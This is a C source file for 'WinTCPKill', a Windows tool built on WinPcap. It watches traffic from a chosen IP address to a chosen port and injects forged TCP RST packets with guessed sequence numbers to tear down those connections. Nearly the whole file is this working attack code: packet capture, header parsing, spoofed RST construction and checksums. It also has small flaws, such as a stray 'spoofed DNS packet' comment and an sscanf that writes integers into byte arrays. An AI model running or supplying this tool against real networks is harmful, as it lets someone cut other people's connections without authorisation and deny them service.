/*
 * WinTCPKill 
 *
 * a simple TCP session killer for Windows
 *
 * It requires WinPcap (http://winpcap.polito.it/)
 *
 */

#include <stdio.h>
#include <winsock2.h>
#include "getopt.h"
#include "packet32.h"
#include "ntddndis.h"
#include "winpcap_common.h"
#include "tcpkill.h"


int main(int argc, char *argv[])
{
  /* getopt */
  extern char  *optarg;
  register int opt;

  /* WinPcap */
  LPADAPTER lpAdapter = 0;
  LPPACKET  lpPacketTCP;
  LPPACKET  lpPacketRST;
  char      buffer[256000];

  /* Packet */  
  unsigned char *packet;
  int           packet_len;

  /* Ethernet header */
  unsigned char	ethersrc[6];
  unsigned char	etherdst[6];

  /* IP header */
  unsigned char	ipsrc[4];
  unsigned char	ipdst[4];

  /* TCP header */
  unsigned short int tcp_src_port;  
  unsigned short int tcp_dst_port;  
  unsigned short int tcp_win;
  unsigned long int  tcp_ack;
    
  /* Flags */
  int flag_port = 0;
  int flag_ip = 0;
  int flag_verbose = 0;  
        

  /* Get options */ 
  while((opt = getopt(argc, argv, "vhp:i:")) != EOF) {
    switch(opt) {     
      /* Help */    	
      case 'h' :
        usage(argv[0]);

	    return(EXIT_SUCCESS);
      
	  /* Verbose mode */
      case 'v' :
		flag_verbose = 1;
		break;

      /* TCP destination port */
      case 'p' :
        tcp_dst_port = atoi(optarg);    
        flag_port = 1;
	    break;

      /* IP source address */
      case 'i' :
        if((strlen(optarg) < 7) || (strlen(optarg) > 15)) {
          usage(argv[0]);

          exit(EXIT_FAILURE);
        }
            
        sscanf(optarg, "%d.%d.%d.%d", 
	       &ipsrc[0], &ipsrc[1], &ipsrc[2], 
	       &ipsrc[3]);
	               		
        flag_ip = 1;
	    break;
	  }
  }
  
  /* Verify all options */
  if(!((flag_ip == 1)&&(flag_port == 1))) {
    usage(argv[0]);

	return(EXIT_FAILURE);
  }      
  
  /* Open selected adapter */ 
  if(open_adapter(&lpAdapter) == EXIT_FAILURE) {
    return(EXIT_FAILURE);
  }

  /* Print informations */
  printf("\n>> WinTCPKill by Valgasu (valgasu@securiteinfo.com) <<\n\n");

  if(flag_verbose == 1) {
    printf("+ IP target : %d.%d.%d.%d\n",
		  ipsrc[0], ipsrc[1], ipsrc[2], ipsrc[3]);
    printf("+ TCP port target : %d\n\n", tcp_dst_port);    
  }
  else {
    printf("+ killing TCP session to port %d from %d.%d.%d.%d\n\n", 
		  tcp_dst_port, ipsrc[0], ipsrc[1], ipsrc[2], ipsrc[3]);
  }

  /* Allocate PACKET structure for RST packet */
  if((lpPacketRST = PacketAllocatePacket()) == NULL) {
    fprintf(stderr, "\nError : failed to allocate the LPPACKET structure.\n");

    return(EXIT_FAILURE);
  }  
  
  /* Set number of packets to send */
  if(PacketSetNumWrites(lpAdapter, 1) == FALSE) {
    fprintf(stderr, "\nWarning : unable to send more than one packet in a single write.\n");
  }


  /* Set hardware filter to directed mode */
  if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_DIRECTED) == FALSE) {
    printf("\nWarning: unable to set directed mode.\n");	
  }

  /* Set a 1 Mo buffer in the driver */
  if(PacketSetBuff(lpAdapter, 1048576) == FALSE){
    printf("\nError: unable to set the kernel buffer.\n");

	return(EXIT_FAILURE);
  }

  /* Set no read timeout i.e. PacketReceivePacket() never returns if no packet arrives */
  if(PacketSetReadTimeout(lpAdapter, 0) == FALSE) {
    printf("\nWarning: unable to set the read timeout.\n");
  }

  
  /* Allocate PACKET structure for incoming TCP packet */
  if((lpPacketTCP = PacketAllocatePacket()) == NULL) {
    printf("\nError: failed to allocate the LPPACKET structure.\n");	

	return(EXIT_FAILURE);
  }
  
  /* Init incomimg TCP packet */
  PacketInitPacket(lpPacketTCP, (char*)buffer, 256000);


  /* Main loop */
  while(1) {
    /* Capture the packets */
	if(PacketReceivePacket(lpAdapter, lpPacketTCP, TRUE) == FALSE) {
	  printf("\nError: PacketReceivePacket failed.\n");      
	  PacketFreePacket(lpPacketTCP);
	  close_adapter(lpAdapter);

	  return(EXIT_FAILURE);
	}

	/* Check if it is a TCP packet */
	if(check_tcp(lpPacketTCP, etherdst, ethersrc, ipsrc, ipdst, tcp_dst_port, &tcp_src_port,
		         &tcp_ack, &tcp_win) == EXIT_SUCCESS) {	
      
	  /* Print incoming TCP packet informations */
	  if(flag_verbose == 1) {
        printf("+ IP source : %d.%d.%d.%d\n",
	          ipsrc[0], ipsrc[1], ipsrc[2], ipsrc[3]);
        printf("+ TCP port : %d\n", tcp_dst_port);    
        printf("+ TCP ACK : %u\n", tcp_ack);    
		printf("+ TCP window : %d\n\n", tcp_win);    
	  }
	  else {
		  printf("+ TCP packet from %d.%d.%d.%d to port %d [ACK:%u WIN:%d]\n", 
	            ipsrc[0], ipsrc[1], ipsrc[2], ipsrc[3], tcp_dst_port, tcp_ack, 
				tcp_win);
      }					  

	  /* Memory allocation */
      packet_len = ETH_HDRSIZE + IP_HDRSIZE + TCP_HDRSIZE;
      packet = (unsigned char *)malloc(packet_len);

	  /* Build the spoofed DNS packet */
      rst_build(packet, ethersrc, etherdst, ipsrc, ipdst, tcp_src_port, tcp_dst_port, 
		        tcp_ack, tcp_win);   
		
	  if(flag_verbose == 1) {
        printf("+ IP destination : %d.%d.%d.%d\n",
	          ipsrc[0], ipsrc[1], ipsrc[2], ipsrc[3]);
        printf("+ TCP port : %d\n", tcp_src_port);    
        printf("+ TCP SEQ : %u\n", tcp_ack + tcp_win);    		
		printf("+ TCP flag : RST\n\n", tcp_ack + tcp_win);    		
      }
	  else{
		  printf("+ TCP packet to %d.%d.%d.%d to port %d [RST SEQ:%u]\n", 
	            ipsrc[0], ipsrc[1], ipsrc[2], ipsrc[3], tcp_src_port, tcp_ack + tcp_win);      
	  }
	  	  	  
      PacketInitPacket(lpPacketRST, packet, packet_len);

	  /* Send the packet */
      if(PacketSendPacket(lpAdapter, lpPacketRST, TRUE) == FALSE) {
        fprintf(stderr, "\nError : unable to send the packets.\n");	                
        PacketFreePacket(lpPacketTCP);
		PacketFreePacket(lpPacketRST);

		return(EXIT_FAILURE);
	  }

	  /* Free buffer */
	  free(packet);	  	  
	}	
  }

  return(EXIT_SUCCESS);
}


int check_tcp(LPPACKET lpPacket, unsigned char *etherdst, unsigned char *ethersrc,
			  unsigned char *ipsrc, unsigned char *ipdst,
			  unsigned short int tcp_dst_port, unsigned short int *tcp_src_port,
			  unsigned long int *tcp_ack_num, unsigned short int *tcp_win)
{
  /* Variables */  
  unsigned int       off = 0;
  unsigned int       tlen, tlen1;      
  struct bpf_hdr     *hdr;		  
  char	             *buf;
  char	             *pChar;
  
  /* Headers */
  struct ether_header *eth;
  struct ip_header    *ip;
  struct tcp_header   *tcp;


  /* Init buffer with packet data */
  buf = (char *)lpPacket->Buffer;		
	
  /* Read packet */	
  hdr = (struct bpf_hdr *)(buf + off);
  tlen1 = hdr->bh_datalen;
  tlen = hdr->bh_caplen;
  off += hdr->bh_hdrlen;	  
  pChar = (char*)(buf + off);	
  off = Packet_WORDALIGN(off + tlen);

  /* Init headers */
  eth = (struct ether_header *)pChar;
  ip = (struct ip_header *)(pChar + ETH_HDRSIZE);
  tcp = (struct tcp_header *)(pChar + ETH_HDRSIZE + IP_HDRSIZE);
  
  if(eth->eth_type == htons(ETH_TYPE_IP)) {	
    if(ip->ip_p == IP_PRO_TCP) {	  				      
	  if(((ip->ip_src)[0] == ipsrc[0])&&((ip->ip_src)[1] == ipsrc[1])&&
		 ((ip->ip_src)[2] == ipsrc[2])&&((ip->ip_src)[3] == ipsrc[3])) {              

	    if(tcp->tcp_dst == htons(tcp_dst_port)) {		  
          if(tcp->tcp_flags & (TCP_PUSH|TCP_ACK|TCP_URG)) {		  
		    /* Read Ethernet destination address */
            memcpy(etherdst, eth->eth_dst_addr, 6);		

  	        /* Read Ethernet source address */
            memcpy(ethersrc, eth->eth_src_addr, 6);		

	        /* Read IP source address */
	        memcpy(ipsrc, ip->ip_src, 4);
	
            /* Read IP destination address  */
	        memcpy(ipdst, ip->ip_dst, 4);
	
		    /* Read TCP source port */
	        *tcp_src_port = ntohs(tcp->tcp_src);		  	  		  

		    /* Read acknowledgement number */
		    *tcp_ack_num = ntohl(tcp->tcp_ack);
          
		    /* Read window */
		    *tcp_win = ntohs(tcp->tcp_win);
		  
		    return(EXIT_SUCCESS);
		  }
		}                  
	  }
	}
  }

  return(EXIT_FAILURE);
} 


void usage(char *name) 
{
  printf("\n>> WinTCPKill by Valgasu (valgasu@securiteinfo.com) <<\n\n");

  printf("\nusage: %s [options]\n\n", name);	    
  printf("options:\n");
  printf("  -p [port] tcp port to kill\n");  
  printf("  -i [ip]   ip source address target\n");
  printf("  -v        verbose\n");    
  printf("  -h        help\n");    
}


void rst_build(unsigned char *packet, unsigned char *dst_etheraddr, 
			   unsigned char *src_etheraddr, unsigned char *ip_dst_addr, 
			   unsigned char *ip_src_addr, unsigned short int tcp_dst_port, 
			   unsigned short int tcp_src_port, unsigned long int tcp_ack, 
			   unsigned short int tcp_win)
{
  /* Headers */
  struct ether_header *eth_hd;
  struct ip_header    *ip_hd;
  struct tcp_header   *tcp_hd; 

  /* Others  */
  int                 sum = 0;
  

  /* Set headers size */
  eth_hd = (struct ether_header *)packet;
  ip_hd = (struct ip_header *)(packet + ETH_HDRSIZE);
  tcp_hd = (struct tcp_header *)(packet + ETH_HDRSIZE + IP_HDRSIZE);
  
  /* Set ethernet header */ 
  memcpy(&(eth_hd->eth_dst_addr), dst_etheraddr, ETH_ADD_LEN);  
  memcpy(&(eth_hd->eth_src_addr), src_etheraddr, ETH_ADD_LEN);
  eth_hd->eth_type = htons(ETH_TYPE_IP);  

  /* Set ip header  */
  ip_hd->ip_v   = 4;
  ip_hd->ip_hl  = 5;
  ip_hd->ip_tos = 0;     
  ip_hd->ip_id  = htons(58883);      
  ip_hd->ip_flags_off = htons(0x4000); 
  ip_hd->ip_ttl = 128;
  ip_hd->ip_p   = IP_PRO_TCP;  
  ip_hd->ip_sum = 0;               

  memcpy(&(ip_hd->ip_src), ip_src_addr, 4);
  memcpy(&(ip_hd->ip_dst), ip_dst_addr, 4);      

  /* Set tcp header */
  tcp_hd->tcp_src = htons(tcp_src_port);
  tcp_hd->tcp_dst = htons(tcp_dst_port);
  tcp_hd->tcp_seq = htonl(tcp_ack + tcp_win);
  tcp_hd->tcp_ack = 0;
  tcp_hd->tcp_res = 0;
  tcp_hd->tcp_off = 5;  
  tcp_hd->tcp_flags = TCP_RST;
  tcp_hd->tcp_win = 0;
  tcp_hd->tcp_sum = 0;
  tcp_hd->tcp_urp = 0;
  
  /* Set ip total length */
  ip_hd->ip_len = htons(IP_HDRSIZE + TCP_HDRSIZE);       

  /* Checksum TCP */
  sum = libnet_in_cksum((u_short *)&ip_hd->ip_src, 8);
  sum += ntohs(IP_PRO_TCP + TCP_HDRSIZE);
  sum += libnet_in_cksum((u_short *)tcp_hd, TCP_HDRSIZE);
  tcp_hd->tcp_sum = LIBNET_CKSUM_CARRY(sum);
  
  /* Checksum IP */
  sum = libnet_in_cksum((u_short *)ip_hd, IP_HDRSIZE);
  ip_hd->ip_sum = LIBNET_CKSUM_CARRY(sum); 
}


int libnet_in_cksum(u_short *addr, int len)
{
  u_short ans;
  u_short *w;
  int     sum;
  int     nleft;
  
  sum = 0;
  ans = 0;
  nleft = len;
  w = addr;

  while(nleft > 1) {
    sum += *w++;
    nleft -= 2;
  }

  if(nleft == 1) {
    *(u_char *)(&ans) = *(u_char *)w;
    sum += ans;
  }

  return(sum);
}
